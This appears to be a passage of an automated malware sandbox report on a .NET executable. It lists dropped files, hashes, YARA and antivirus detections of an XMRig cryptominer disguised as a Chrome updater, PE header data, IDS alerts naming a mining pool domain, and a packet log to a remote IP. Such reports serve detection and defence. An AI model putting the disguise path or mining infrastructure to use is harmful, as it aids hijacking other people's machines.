                                                                                                    Preview:ElfChnk.......................................................................................................................`................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................&.......................**...............[.]%..........{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.0819948809527125
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:PKTKQKFKEKIK9KWKbKSKmKjKYKwKfKgKhKV+K/KbKUKAKbKEKwKAK0KOKDKSKqKK:PKTKQKFKEKIK9KWKbKSKmKjKYKwKfKgi
                                                                                                    MD5:C00F0684FB556A3B11A3931B206DDEB7
                                                                                                    SHA1:AEAB7B77960F67D15108514EFE4D320FB7D97187
                                                                                                    SHA-256:31CC9DB8ACFF9CC72EC13F3C68AC0C1F3901E0C6370466BCF9F08D2E7359748C
                                                                                                    SHA-512:1ED96E30EA4FFAC356D8C2B22F2F0687F164149D3C8FC51B9BAF9C4CF252F49A89B9EA8E61F69A51003FFD02191D6550033E1E67C5325598AAFA47AC75DC6E30
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.........................................X...b..........................................................................................:...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................6...................................................................................**..............E6v(T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85432
                                                                                                    Entropy (8bit):4.2206486703289
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:/Rgh9R+URWR8RhRPRDFRHhRxRXRlVRVRmRLReRifyyngRLfyjRSfymRCRsyRsRxm:OHQBnMDhjYHn
                                                                                                    MD5:4C5D1622D95EF8C89A602D74925FF986
                                                                                                    SHA1:2DBCDBE7BC71215903E3F724DC70EAD2F1F85A56
                                                                                                    SHA-256:AB8A0E9EFDC77720FBFCFF673F5B86C9214C47B374BC126651DB8F7E695FA227
                                                                                                    SHA-512:3316C6B8A50AABA895CBE1664B4EEE8A69717CC9D50B3E2EABA87434961504EBD11E132007E05B73E74E9D29F2F500AACA08503362DFD14652D4B12610359B2B
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.........%...............%............3...5...........................................................................[..............................................=...................................................................%...........................................'$.......#..f...Z........$..?...............................i$......?.......M...F....#..........}...............................&...."......................................................(.......................................**......%.......*.W.........*.rs&...............................................................<.......T.....!................@*.W...9^.u..TC....w.......h...%....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......."......$...............R...S.c.h.e.d.u.l.e.d.T.a.s.k.P.r.o.v.......w.m.i.p.r.v.s.e...e.x.e.......%.S.Y.S.T.E.M.R.O.O.T.%.\.S.y.s.t.e.m.3.2
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.310567316592127
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:JhiBwB0BwBR8bBm7OBwBS4BwB/+BwBqUn8BwBcBwBsGUiBwBUPojBwBqhBPYhsBc:JJ8bUdjYqKxMSKNEKWtmp4msr
                                                                                                    MD5:CBE9946661FC570A35E03A287A348B77
                                                                                                    SHA1:345476AFB20E45CEDB481F520C02F615B7A6BC76
                                                                                                    SHA-256:F1B151FA5EF545C96C010E1056DE6B3EC0DB7C063E234C798EE039942C8FD988
                                                                                                    SHA-512:8328ED33EBF3213703B729022D2D1E02587C93583D1C799D8DD70FCB250B009596B8F2A21DC14AA40EE1E7F62FB7161AA9CCB19D2B9432EB99DA54D3F829BE66
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk..................................... C..PF..6........................................................................+..............................................=...........................................................................................................................f...............?...........................m...................M...F...................W.......................................................................................................&.......................**.. .............."..........{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.197264309835545
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:chpY+YdAYkf2YbYoY2YxYaY7YlYgYBYBTYGYSOXY1YHYFY8NYfYOpYDYoY9YK/9Y:c4wQ45/1obSO8nVy
                                                                                                    MD5:212FBE0E87DBAF827519FBE731A52823
                                                                                                    SHA1:24D241281BA5E7CFF41F8D6A72BB606A7FFCCD9A
                                                                                                    SHA-256:36F437B9C107F422E965A26B338A9088C53E4A6352962D1C00EEE5D9234D97C7
                                                                                                    SHA-512:4FAE5393B55AE68186D185CA27D8007A750D65D2E71C06DB162E97A56BF556D8902748A706091CA265FE921DF4A6C9D523AB193AD46E339F7D5F8ED5876DAE80
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.........z...............z...............H...8~G.......................................................................Y.................r...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...............................E...................m)..........K....................................+......................**................6."...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):68120
                                                                                                    Entropy (8bit):4.282202859087065
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:YkFR4kFRKvnQ5oIMtdyo0Mt8op0MorN9o0MtEJo0MtQ1a2oT0ojoKosZJoOododH:h/eo7dggbCj
                                                                                                    MD5:A960081B3DD373FB0181E29370B6A438
                                                                                                    SHA1:4F26CF87C30B0DAC43C0B9CABCCB666190936DE6
                                                                                                    SHA-256:3EF116863432F618C3E134842B5F48C6A83383489F9063D5678511E902539917
                                                                                                    SHA-512:4602E3E7D164319FE604C21D6CF7514C2EDCD443800E0AA2BE5C8A1034EA2A6ECEB977122AA6B0632AAC6AD3838806C5627EFC23971C281589E7C5B73B0BB760
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk..................].......].................. y[......................................................................>......................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...................................................&...........................................................................................**.......].......I.W...........L.&.........L.)[._j;h./..`?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):82384
                                                                                                    Entropy (8bit):4.456292042571095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:bWjDnjWjDngZhrUcSalhGQPJQJytU3c46yy3WjDn6n:qPnCPn42TcEtc46dGPnW
                                                                                                    MD5:266B1879FD02767186EE411847DE6C12
                                                                                                    SHA1:161D06E93F4A344D0242789FC3AF5B2946DA8BE6
                                                                                                    SHA-256:5764BDF3BA8CDD8776B09788CB6A63FD4B7D8715930002C4A158811EC66EC11B
                                                                                                    SHA-512:96A2169069EEB216626CF20007C73ABE8F7D504B3CC9A2563294363A94206AD27CF7974B120777640A29DA692C68550467FBCAA34BBE3E5429A337E2FBDAE25F
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk......................... ...........(........zi.....................................................................b...................@...s...h...............h...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...................&...........................................................................................................................**..0............I.W.........M.PK&.......M.PK\.:X..r.o.dx;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57952
                                                                                                    Entropy (8bit):3.8708574097073822
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:sC+gjGMu2kykVe97Ifd4k3KitC84z+kqPJl/d:Qhx
                                                                                                    MD5:98099999DC7566C1E7B9171AE45BB285
                                                                                                    SHA1:65CE4AAA14774BFE780ABFA7978AAAD50A8F6443
                                                                                                    SHA-256:23E68786C78199BAA60460BA13968696824ECDD7540A951F9EB0265C816272EC
                                                                                                    SHA-512:94EDAF29FEB0AD101BF77BEE10ED986BA2C0AC0B9B2394FDF2156C141840AB078C3AF2D179928C22265FEA1796F0D2F859DC1EA7E50D9F18A7C581F51EAE7BA3
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.....................................xj...s...'W....................................................................................................................=..........................................................................................................................._...............8...........................f...................M...c...........................n.......................................................................................&...............................**...............a.W.........z...&.......z...S..\..`..).*........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5536256
                                                                                                    Entropy (8bit):6.689058470432344
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                                                                                    MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                                                                                    SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                                                                                    SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                                                                                    SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: Joe Security
                                                                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: ditekSHen
                                                                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: Florian Roth
                                                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: unknown
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 70%
                                                                                                    Reputation:unknown
                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):5.552632611901318
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:zufmUwylvo.exe
                                                                                                    File size:266'752 bytes
                                                                                                    MD5:c526cb2c72a976831c06fc09991e20d8
                                                                                                    SHA1:b719c9c64a5368abf2671a0e8d6ef8902bdaf9aa
                                                                                                    SHA256:53ad8953df55fbe65065f3e94135a4596f6209f20947c0e3df949910ce6cbbc6
                                                                                                    SHA512:a9d97d89d01fb056515ba4e3bb8d9e1836adb468564979fddc654855aa8d74946f3e8a287bad95c81f1e33e36a66655735f2b849e920ef07664ee90bd32a338e
                                                                                                    SSDEEP:6144:xZuorQXqrFqkp4AsBIPO/BbyiL/5CVlKULZSvb:jAq7pwIBSRilKUL
                                                                                                    TLSH:CA441A2A3BE50808E0EE89FE999E5B77C654D1127801B753B75372B20D05AFCED4B0E6
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C............"...0.............n'... ...@....@.. ....................................`................................
                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                    Entrypoint:0x44276e
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x9AEB43BA [Sun May 12 06:52:42 2052 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x427200x4b.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x5ae.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x460000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000x407740x40800a710abf6d7128ae3279495321dd9dbd5False0.44782203851744184data5.567050370118544IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x440000x5ae0x600d00b022c8db8809a6c714f9f6a9394cdFalse0.423828125data4.07561211898091IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x460000xc0x2000fd7bf495fecf199e3baed688870330cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_VERSION0x440a00x324data0.43407960199004975
                                                                                                    RT_MANIFEST0x443c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-10-09T16:30:15.039753+02002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.11.30547431.1.1.153UDP
                                                                                                    2024-10-09T16:30:17.283464+02002054247ET MALWARE SilentCryptoMiner Agent Config Inbound1104.20.3.235443192.168.11.3049779TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 9, 2024 16:29:48.645433903 CEST49775443192.168.11.3084.32.84.151
                                                                                                    Oct 9, 2024 16:29:48.645472050 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:48.646370888 CEST49775443192.168.11.3084.32.84.151
                                                                                                    Oct 9, 2024 16:29:48.653393984 CEST49775443192.168.11.3084.32.84.151
                                                                                                    Oct 9, 2024 16:29:48.653419971 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:48.871460915 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:48.871690035 CEST49775443192.168.11.3084.32.84.151
                                                                                                    Oct 9, 2024 16:29:48.876605988 CEST49775443192.168.11.3084.32.84.151
                                                                                                    Oct 9, 2024 16:29:48.876621008 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:48.876852989 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:48.917752981 CEST49775443192.168.11.3084.32.84.151
                                                                                                    Oct 9, 2024 16:29:48.960216045 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:49.076925993 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:49.077003002 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:49.077264071 CEST49775443192.168.11.3084.32.84.151
                                                                                                    Oct 9, 2024 16:29:49.077279091 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:49.084512949 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:49.084754944 CEST49775443192.168.11.3084.32.84.151
                                                                                                    Oct 9, 2024 16:29:49.084769964 CEST4434977584.32.84.151192.168.11.30
                                                                                                    Oct 9, 2024 16:29:49.090984106 CEST4434977584.32.84.151192.168.11.30
